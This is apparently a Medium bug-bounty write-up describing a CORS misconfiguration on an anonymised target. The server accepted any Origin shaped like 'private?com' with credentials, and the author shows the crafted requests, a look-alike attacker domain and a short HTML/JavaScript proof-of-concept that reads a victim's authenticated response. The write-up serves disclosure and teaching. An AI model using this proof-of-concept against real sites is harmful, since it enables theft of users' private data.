Virus0X01
Virus0X01
Jan 23 · 2 min read

CORS Misconfiguration leading to Private Information Disclosure

Hi hackers, today i will talk about CORS that i found in a private program

let’s call it private.com

After doing some recon , i found this domain let’s say xyz.private.com

i sent a request to burp to start doing some crawling and parameter digging and so on , request was sent to the server with Origin header

GET / HTTP/1.1 
Host: xyz.private.com
Origin: https://xyz.private.com
Connection: close

the origin header was accepted by Access-Control-Allow-Origin header and the Access-Control-Allow-Credentials was set to true

Access-Control-Allow-Credentials: true 
Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS, DELETE Access-Control-Allow-Origin: https://xyz.private.com
Access-Control-Expose-Headers:

here i started to do some investigation to see how the server handles the origin header

so i sent a request with the main domain only to server and the server accepted it

Access-Control-Allow-Credentials: true 
Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS, DELETE Access-Control-Allow-Origin: https://private.com
Access-Control-Expose-Headers:

i deleted the dot from private.com and it was accepted too , the server checks if the domain name and com exists neglecting any thing between them .

i sent a request with 1 between private and com like this

GET / HTTP/1.1 
Host: xyz.private.com
Origin: https://private1com
Connection: close

and it got accepted :)

Access-Control-Allow-Credentials: true 
Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS, DELETE Access-Control-Allow-Origin: https://private1com
Access-Control-Expose-Headers:

i signed a domain on https://ae.000webhost.com with the name https://privatescom.000webhostapp.com , i put “s” instead of 1 because it wasn’t allowed in the subdomain name.

with small piece of code i could make the POC

<!DOCTYPE html> 
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange
= function()
{
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML
= alert(this.responseText);
}
};
xhttp.open("GET", "https://xyz.private.com",
true);
xhttp.withCredentials
= true;
xhttp.send();
}
</script>
</body>
</html>

and we got the response on our domain , and i could steal any user’s personal information.

simple POC

i’d like to thank my friend offensive hunterr , he gave me the idea of signing the domain and helped me with the JS code ❤

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade